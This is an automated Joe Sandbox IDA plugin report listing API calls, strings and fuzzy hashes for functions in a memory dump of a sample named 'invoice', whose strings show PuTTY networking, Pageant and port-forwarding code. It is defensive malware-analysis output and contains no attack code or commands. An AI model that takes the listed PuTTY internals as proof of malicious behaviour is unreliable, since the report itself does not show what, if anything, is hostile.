Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: memcpy_s$_invalid_parameter_noinfo
String ID: $MZx
API String ID: 2880407647-1316729395
Opcode ID: 299e4ec48c83bfee535b49620c06d98fb2d65991a50999501f3f2e4165a05e32
Instruction ID: cd2751e1366de62d3683849f661bc07f0305420cd936091d43046fa43320c999
Opcode Fuzzy Hash: 299e4ec48c83bfee535b49620c06d98fb2d65991a50999501f3f2e4165a05e32
Instruction Fuzzy Hash: 6703E772A102D18FE775CEA9D848BE937A5F78878CF405129EA065BBC9D735CB06CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCE360 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 166pipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 000000013FDCE42E
CreatePipe.KERNEL32 ref: 000000013FDCE457
CreatePipe.KERNEL32 ref: 000000013FDCE480
SetHandleInformation.KERNEL32 ref: 000000013FDCE4A5
SetHandleInformation.KERNEL32 ref: 000000013FDCE4B7
SetHandleInformation.KERNEL32 ref: 000000013FDCE4CE
CreateProcessA.KERNEL32 ref: 000000013FDCE550
CloseHandle.KERNEL32 ref: 000000013FDCE560
CloseHandle.KERNEL32 ref: 000000013FDCE566
CloseHandle.KERNEL32 ref: 000000013FDCE578
CloseHandle.KERNEL32 ref: 000000013FDCE582
CloseHandle.KERNEL32 ref: 000000013FDCE591
CloseHandle.KERNEL32 ref: 000000013FDCE5E9
CloseHandle.KERNEL32 ref: 000000013FDCE60C
CloseHandle.KERNEL32 ref: 000000013FDCE616
CloseHandle.KERNEL32 ref: 000000013FDCE620
CloseHandle.KERNEL32 ref: 000000013FDCE62A
GetLastError.KERNEL32 ref: 000000013FDCE62C

Strings

Starting local proxy command: %s, xrefs: 000000013FDCE3C2
, xrefs: 000000013FDCE535
Unable to create pipes for proxy command: %s, xrefs: 000000013FDCE639

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Handle$Close$Create$InformationPipe$ErrorLastProcess
String ID: $Starting local proxy command: %s$Unable to create pipes for proxy command: %s
API String ID: 876556870-420968438
Opcode ID: 86b5b7394f79d0c09d782a534fd13cd319b72b40c639e52f0a2bcc912f62648e
Instruction ID: f8e2b1c334b0fd75aa3f5ad878b59d0c00240ab6cc2202f0669881600dec6741
Opcode Fuzzy Hash: 86b5b7394f79d0c09d782a534fd13cd319b72b40c639e52f0a2bcc912f62648e
Instruction Fuzzy Hash: 98717E76A1868185EA70DB55F8647EE6760F7C9B80F41403ADA8E43B99DF7CC6878B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCB9EF Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 289networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 000000013FDCBA35
socket.WS2_32 ref: 000000013FDCBADF
SetHandleInformation.KERNEL32 ref: 000000013FDCBB02
setsockopt.WS2_32 ref: 000000013FDCBB32
setsockopt.WS2_32 ref: 000000013FDCBB62
setsockopt.WS2_32 ref: 000000013FDCBB92
htonl.WS2_32 ref: 000000013FDCBBFF
htons.WS2_32 ref: 000000013FDCBC1B
WSAGetLastError.WS2_32 ref: 000000013FDCBC38
WSAGetLastError.WS2_32 ref: 000000013FDCBC5C
htons.WS2_32 ref: 000000013FDCBCB2
htonl.WS2_32 ref: 000000013FDCBD49
htons.WS2_32 ref: 000000013FDCBD6F
bind.WS2_32 ref: 000000013FDCBC2D

Part of subcall function 000000013FDCEE6C: WSAAsyncSelect.WS2_32 ref: 000000013FDCEEBF

connect.WS2_32 ref: 000000013FDCBE20
WSAGetLastError.WS2_32 ref: 000000013FDCBEA0

Strings

sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 000000013FDCBD12
../windows/winnet.c, xrefs: 000000013FDCBD19

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ErrorLasthtonssetsockopt$htonl$AsyncHandleInformationSelectbindclosesocketconnectsocket
String ID: ../windows/winnet.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
API String ID: 1865841491-3412605540
Opcode ID: d5f9e5c8007edec2314176c4eaa70c1a7c0630d8193da60b5a0945041473bf5a
Instruction ID: f59c27f5e7467d117532359dd83086110b2c900fe62c282c650d1c2e3cdd7d44
Opcode Fuzzy Hash: d5f9e5c8007edec2314176c4eaa70c1a7c0630d8193da60b5a0945041473bf5a
Instruction Fuzzy Hash: EFD1BD76A04B8486EB249F65E44C7AE77A4FB88B84F410139DE4E077A4DF7DC686CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCDA57 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262filememorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDCD2FC: strchr.LIBVCRUNTIME ref: 000000013FDCD356
Part of subcall function 000000013FDCD2FC: CreateFileA.KERNEL32 ref: 000000013FDCD3B5
Part of subcall function 000000013FDCD2FC: GetLastError.KERNEL32 ref: 000000013FDCD3BD
Part of subcall function 000000013FDCD2FC: WaitNamedPipeA.KERNEL32 ref: 000000013FDCD3D0
Part of subcall function 000000013FDCD2FC: GetLastError.KERNEL32 ref: 000000013FDCD3D7

WriteFile.KERNEL32 ref: 000000013FDCDAFA
CloseHandle.KERNEL32 ref: 000000013FDCDB3A
FindWindowA.USER32 ref: 000000013FDCDB85
GetCurrentThreadId.KERNEL32 ref: 000000013FDCDB9C
LocalAlloc.KERNEL32 ref: 000000013FDCDBE2
ReadFile.KERNEL32 ref: 000000013FDCDCD9
LocalFree.KERNEL32 ref: 000000013FDCDD25
CreateFileMappingA.KERNEL32 ref: 000000013FDCDD4C
MapViewOfFile.KERNEL32 ref: 000000013FDCDD8C
SendMessageA.USER32 ref: 000000013FDCDDD8
UnmapViewOfFile.KERNEL32 ref: 000000013FDCDE2E
CloseHandle.KERNEL32 ref: 000000013FDCDE37
LocalFree.KERNEL32 ref: 000000013FDCDE4F

Strings

PageantRequest%08x, xrefs: 000000013FDCDBA2
Pageant, xrefs: 000000013FDCDB7B

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: File$Local$CloseCreateErrorFreeHandleLastView$AllocCurrentFindMappingMessageNamedPipeReadSendThreadUnmapWaitWindowWritestrchr
String ID: Pageant$PageantRequest%08x
API String ID: 714206183-270379698
Opcode ID: 3b394aa88846e5f300d3f788aa170002a9a2a3e16a344c2ddaedb9416fcaab29
Instruction ID: 14a0ec1d947eb0ea86f4d70b7644c267f60527c0af8aa8bfc04f8c3d83536be5
Opcode Fuzzy Hash: 3b394aa88846e5f300d3f788aa170002a9a2a3e16a344c2ddaedb9416fcaab29
Instruction Fuzzy Hash: 9EB1B435B0474086EF50AFA2E85879A73A1F785BE4F444139EEAA47BD9DF3CC6468700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD05CF Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 168registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 000000013FDD0609
GetProcAddress.KERNEL32 ref: 000000013FDD064E
RegQueryValueExA.ADVAPI32 ref: 000000013FDD0684
RegCloseKey.ADVAPI32 ref: 000000013FDD0691
GetEnvironmentVariableA.KERNEL32 ref: 000000013FDD07B2
GetEnvironmentVariableA.KERNEL32 ref: 000000013FDD07C8
GetWindowsDirectoryA.KERNEL32 ref: 000000013FDD0830

Part of subcall function 000000013FDD0E35: CreateFileA.KERNEL32 ref: 000000013FDD0E82

Strings

RandSeedFile, xrefs: 000000013FDD0675
Software\SimonTatham\PuTTY, xrefs: 000000013FDD05F6
HOMEDRIVE, xrefs: 000000013FDD0796
shell32.dll, xrefs: 000000013FDD0628
\PUTTY.RND, xrefs: 000000013FDD0704, 000000013FDD075B, 000000013FDD07E7, 000000013FDD083D
HOMEPATH, xrefs: 000000013FDD07B6
`Ycw, xrefs: 000000013FDD079D
SHGetFolderPathA, xrefs: 000000013FDD0644

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: EnvironmentVariable$AddressCloseCreateDirectoryFileOpenProcQueryValueWindows
String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$`Ycw$shell32.dll
API String ID: 2275640379-2914344219
Opcode ID: 30aae5b202872cee4a85cf4012b57ad0c34ee7f8746262654223321c6f172845
Instruction ID: 1cfb7e0b403121a5c97a41691c6afc770ad849859bea9485a961ee24c41c654e
Opcode Fuzzy Hash: 30aae5b202872cee4a85cf4012b57ad0c34ee7f8746262654223321c6f172845
Instruction Fuzzy Hash: AD71A035B0469496FA60EB65F4587DA2390ABC9790F800139E98E47BE9EF29C707CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF0E14 Relevance: 25.8, APIs: 9, Strings: 5, Instructions: 1256COMMONLIBRARYCODE

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 000000013FDF0E5D
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDF147E
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDF1641
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDF1846
memcpy_s.LIBCPMT ref: 000000013FDF1DEC
memcpy_s.LIBCPMT ref: 000000013FDF1E93
memcpy_s.LIBCPMT ref: 000000013FDF1F5C

Part of subcall function 000000013FDE51AC: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDE51D1

Strings

MZx, xrefs: 000000013FDF149D, 000000013FDF1504, 000000013FDF1869, 000000013FDF1941, 000000013FDF19A4, 000000013FDF1CD3
1#SNAN, xrefs: 000000013FDF1FF7
1#INF, xrefs: 000000013FDF2037
1#IND, xrefs: 000000013FDF1FD7
1#QNAN, xrefs: 000000013FDF2017

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$MZx
API String ID: 808467561-2638907429
Opcode ID: bb862d2305413c2d5c1c506fee278af418b026696f8acfb30f381c1918b843c9
Instruction ID: 9120190d520ccb1e3903ad20a6ae876a4be138236aebaeb53a907a0d032b9a64
Opcode Fuzzy Hash: bb862d2305413c2d5c1c506fee278af418b026696f8acfb30f381c1918b843c9
Instruction Fuzzy Hash: 12B2E172E103818BE765CEA9D948FED37A5F394388F50523DDA0697B88D735CB4A8B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD698D2 Relevance: 25.5, Strings: 20, Instructions: 523COMMON

Download Yara Rule

Strings

remote, xrefs: 000000013FD69C5D
%s to %s:%d, xrefs: 000000013FD69C96
dynamic, xrefs: 000000013FD69C19
Local %sport %s forwarding to %s%s%s, xrefs: 000000013FD69EE2
%s%s%s%s%d%s, xrefs: 000000013FD69DD2
failed: , xrefs: 000000013FD69E99, 000000013FD69F56
Service lookup failed for source port "%s", xrefs: 000000013FD69A41
Local %sport %s SOCKS dynamic forwarding%s%s, xrefs: 000000013FD69F95
%s:%s%s%d%s, xrefs: 000000013FD69E24
local, xrefs: 000000013FD69C6E
Duplicate remote port forwarding to %s:%d, xrefs: 000000013FD6A0A9
IPv6 , xrefs: 000000013FD69EAF, 000000013FD69F6C
IPv4 , xrefs: 000000013FD69EBD, 000000013FD69F7A
D, xrefs: 000000013FD69C88
Requesting remote port %s forward to %s, xrefs: 000000013FD6A03F
Service lookup failed for destination port "%s", xrefs: 000000013FD69BB3
%.*s, xrefs: 000000013FD699CD, 000000013FD69A87
Cancelling %s, xrefs: 000000013FD69C27
%s port forwarding from %s%s%d, xrefs: 000000013FD69C20
localhost, xrefs: 000000013FD69FE2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: getservbynamehtons
String ID: failed: $%.*s$%s port forwarding from %s%s%d$%s to %s:%d$%s%s%s%s%d%s$%s:%s%s%d%s$Cancelling %s$D$Duplicate remote port forwarding to %s:%d$IPv4 $IPv6 $Local %sport %s SOCKS dynamic forwarding%s%s$Local %sport %s forwarding to %s%s%s$Requesting remote port %s forward to %s$Service lookup failed for destination port "%s"$Service lookup failed for source port "%s"$dynamic$local$localhost$remote
API String ID: 3889749166-4127257296
Opcode ID: edfafb572ca0f1c487f779af92fc7a92956b912d9a2b5e85487709ab0c8830ac
Instruction ID: 51a4855f034f566c024e59382d3a6b7c73f13492cfe19e267ff81bf3ff3861c2
Opcode Fuzzy Hash: edfafb572ca0f1c487f779af92fc7a92956b912d9a2b5e85487709ab0c8830ac
Instruction Fuzzy Hash: 2D328076B04B4486EA50DF92D5487DAB7A1F784BD4F81443AEE4E87BA9DF38C642C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD54874 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 192COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32 ref: 000000013FDBA1EA
CreateFontA.GDI32 ref: 000000013FDBABF0
GetDC.USER32 ref: 000000013FDBABFB
SelectObject.GDI32 ref: 000000013FDBAC0F
GetTextMetricsA.GDI32 ref: 000000013FDBAC22

Strings

Font: %s, %sdefault height, xrefs: 000000013FDBA1D0
pixel, xrefs: 000000013FDBA19B
Font: %s, %s%d-%s, xrefs: 000000013FDBA1BF
bold, , xrefs: 000000013FDBA189
point, xrefs: 000000013FDBA1A2
../windows/winctrls.c, xrefs: 000000013FDBA157
c && c->ctrl->generic.type == CTRL_FONTSELECT, xrefs: 000000013FDBA150

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Text$CreateFontItemMetricsObjectSelect
String ID: ../windows/winctrls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->generic.type == CTRL_FONTSELECT$pixel$point
API String ID: 2403487786-551565953
Opcode ID: de52bafd6bbe522f831516b134bc3b6b6ff4dbbbbe73007034cc4cc59f337b22
Instruction ID: 6ef869c9a9c71ab4269cb57130a8f484f4775a4a2f5c5f40947e876c8a804eb8
Opcode Fuzzy Hash: de52bafd6bbe522f831516b134bc3b6b6ff4dbbbbe73007034cc4cc59f337b22
Instruction Fuzzy Hash: 6C61D232B0424486FA64DFA6E8587DE6791A789BD0F54803D9E0E87BA5DE38CA43C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCBEF2 Relevance: 22.7, APIs: 15, Instructions: 230networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 000000013FDCBFB8
SetHandleInformation.KERNEL32 ref: 000000013FDCBFE2
setsockopt.WS2_32 ref: 000000013FDCC011
getaddrinfo.WS2_32 ref: 000000013FDCC0AD
htons.WS2_32 ref: 000000013FDCC0EE
inet_addr.WS2_32 ref: 000000013FDCC11D
htonl.WS2_32 ref: 000000013FDCC12E
htons.WS2_32 ref: 000000013FDCC164
bind.WS2_32 ref: 000000013FDCC18A
listen.WS2_32 ref: 000000013FDCC19D
closesocket.WS2_32 ref: 000000013FDCC1C0
WSAGetLastError.WS2_32 ref: 000000013FDCC1CB
closesocket.WS2_32 ref: 000000013FDCC1DA
closesocket.WS2_32 ref: 000000013FDCC1F2
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,-00000028,00000000), ref: 000000013FDCC1F8

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: closesocket$ErrorLasthtons$HandleInformationbindgetaddrinfohtonlinet_addrlistensetsockoptsocket
String ID:
API String ID: 997464521-0
Opcode ID: 5c6a418d2e592c3204d1649268f7045b7d50ecac2277982ec4dc7beebf944642
Instruction ID: aa7b730589c8bde96f6eb5720d0cc94c84e44979ae03e928c3f34ebac53a694f
Opcode Fuzzy Hash: 5c6a418d2e592c3204d1649268f7045b7d50ecac2277982ec4dc7beebf944642
Instruction Fuzzy Hash: 91A1C332A047848AEB64AF66E5483DA73A0F785B54F448239DF9D437E5EF38C696C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE0258 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 559COMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDE9C54: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDE9C7A

Part of subcall function 000000013FDE9BC8: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDE9BEE

GetModuleHandleExW.KERNEL32 ref: 000000013FDE0302
GetModuleFileNameW.KERNEL32 ref: 000000013FDE0324
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE079D

Part of subcall function 000000013FDEB848: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDEB876

Strings

Line: , xrefs: 000000013FDE05D7
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 000000013FDE06EC
<program name unknown>, xrefs: 000000013FDE032E
Program: , xrefs: 000000013FDE02C3
Expression: , xrefs: 000000013FDE0649
(Press Retry to debug the application - JIT must be enabled), xrefs: 000000013FDE0720
..., xrefs: 000000013FDE039D, 000000013FDE048B, 000000013FDE04E9, 000000013FDE053B, 000000013FDE0570, 000000013FDE06A9
File: , xrefs: 000000013FDE03E0
Assertion failed!, xrefs: 000000013FDE0289

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo$Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
API String ID: 3031022502-1508414584
Opcode ID: b099525e78971d803941bf8a4ac47adb4f17e2b4e13ca06dab9807e8919be2d4
Instruction ID: 09addd7001068abad3bea7b141124a569d16ede4fb0b6638cad483f95af2fd77
Opcode Fuzzy Hash: b099525e78971d803941bf8a4ac47adb4f17e2b4e13ca06dab9807e8919be2d4
Instruction Fuzzy Hash: F112E335B0039542F764EFF2791EBDA7255ABA8784F44813EAE4E46EA5DE3CC213C640

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCE9AE Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDCEB82: AllocateAndInitializeSid.ADVAPI32 ref: 000000013FDCEC29
Part of subcall function 000000013FDCEB82: AllocateAndInitializeSid.ADVAPI32 ref: 000000013FDCEC81
Part of subcall function 000000013FDCEB82: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000013FDCED25), ref: 000000013FDCEC8B

LocalAlloc.KERNEL32 ref: 000000013FDCEA8D
InitializeSecurityDescriptor.ADVAPI32 ref: 000000013FDCEAA4
SetSecurityDescriptorOwner.ADVAPI32 ref: 000000013FDCEABC
SetSecurityDescriptorDacl.ADVAPI32 ref: 000000013FDCEAD5
GetLastError.KERNEL32 ref: 000000013FDCEB15
LocalFree.KERNEL32 ref: 000000013FDCEB39
LocalFree.KERNEL32 ref: 000000013FDCEB4F

Strings

unable to set DACL in security descriptor: %s, xrefs: 000000013FDCEB0E
unable to initialise security descriptor: %s, xrefs: 000000013FDCEAFC
unable to set owner in security descriptor: %s, xrefs: 000000013FDCEB05
unable to allocate security descriptor: %s, xrefs: 000000013FDCEAF3
unable to construct ACL: %s, xrefs: 000000013FDCEA6A

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
API String ID: 436594416-3066058096
Opcode ID: 6cd73dad8daf6ccb42d1f395066400e1c9de75ff966edec1cbbc616e578952eb
Instruction ID: 7f6d48ae41400217bb85955992abd972c9e8f8c37b6476185d96a0d8d81dce27
Opcode Fuzzy Hash: 6cd73dad8daf6ccb42d1f395066400e1c9de75ff966edec1cbbc616e578952eb
Instruction Fuzzy Hash: DE515E76A01B0095FB50DF66E8587A973A6FB44B94F41403A9E4E837A4EF3DC646C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD60F94 Relevance: 18.8, Strings: 15, Instructions: 89COMMON

Download Yara Rule

Strings

SIGSEGV, xrefs: 000000013FD61099
SIGALRM, xrefs: 000000013FD61045
SIGUSR2, xrefs: 000000013FD610C3
SIGINT (Interrupt), xrefs: 000000013FD60FB2
SIGTERM (Terminate), xrefs: 000000013FD60FC7
SIGQUIT (Quit), xrefs: 000000013FD60FF1
SIGABRT, xrefs: 000000013FD61030
More signals, xrefs: 000000013FD6101B
SIGKILL (Kill), xrefs: 000000013FD60FDC
SIGHUP (Hangup), xrefs: 000000013FD61006
SIGFPE, xrefs: 000000013FD6105A
Break, xrefs: 000000013FD60FA0
SIGUSR1, xrefs: 000000013FD610AE
SIGPIPE, xrefs: 000000013FD61084
SIGILL, xrefs: 000000013FD6106F

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
